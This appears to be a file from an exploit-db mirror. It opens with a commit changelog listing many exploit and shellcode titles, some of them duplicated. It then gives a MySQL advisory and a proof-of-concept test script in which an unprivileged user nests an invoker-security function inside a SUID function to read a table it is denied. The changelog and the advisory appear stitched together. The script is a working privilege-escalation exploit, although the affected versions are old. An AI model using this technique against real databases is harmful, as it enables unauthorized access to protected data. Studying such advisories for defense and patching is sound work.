exploit-db-mirror/exploits/linux/remote/28398.txt
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
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source: https://www.securityfocus.com/bid/19559/info
MySQL is prone to these vulnerabilities:
- A privilege-elevation vulnerability. A user with privileges to execute SUID routines may gain elevated privileges by executing certain commands and code with higher privileges.
- A security-bypass vulnerability. A user can bypass restrictions and create new databases.
MySQL 5.0.24 and prior versions are affected by these issues.
--disable_warnings
drop database if exists mysqltest1;
drop database if exists mysqltest2;
drop function if exists f_suid;
--enable_warnings
# Prepare playground
create database mysqltest1;
create database mysqltest2;
create user malory@localhost;
grant all privileges on mysqltest1.* to malory@localhost;
# Create harmless (but SUID!) function
create function f_suid(i int) returns int return 0;
grant execute on function test.f_suid to malory@localhost;
use mysqltest2;
# Create table in which malory@localhost will be interested but to which
# he won't have any access
create table t1 (i int);
connect (malcon, localhost, malory,,mysqltest1);
# Correct malory@localhost don't have access to mysqltest2.t1
--error ER_TABLEACCESS_DENIED_ERROR
select * from mysqltest2.t1;
# Create function which will allow to exploit security hole
delimiter |;
create function f_evil ()
returns int
sql security invoker
begin
set @a:= current_user();
set @b:= (select count(*) from mysqltest2.t1);
return 0;
end|
delimiter ;|
# Again correct
--error ER_TABLEACCESS_DENIED_ERROR
select f_evil();
select @a, @b;
# Oops!!! it seems that f_evil() is executed in the context of
# f_suid() definer, so malory@locahost gets all info that he wants
select test.f_suid(f_evil());
select @a, @b;
connection default;
drop user malory@localhost;
drop database mysqltest1;
drop database mysqltest2;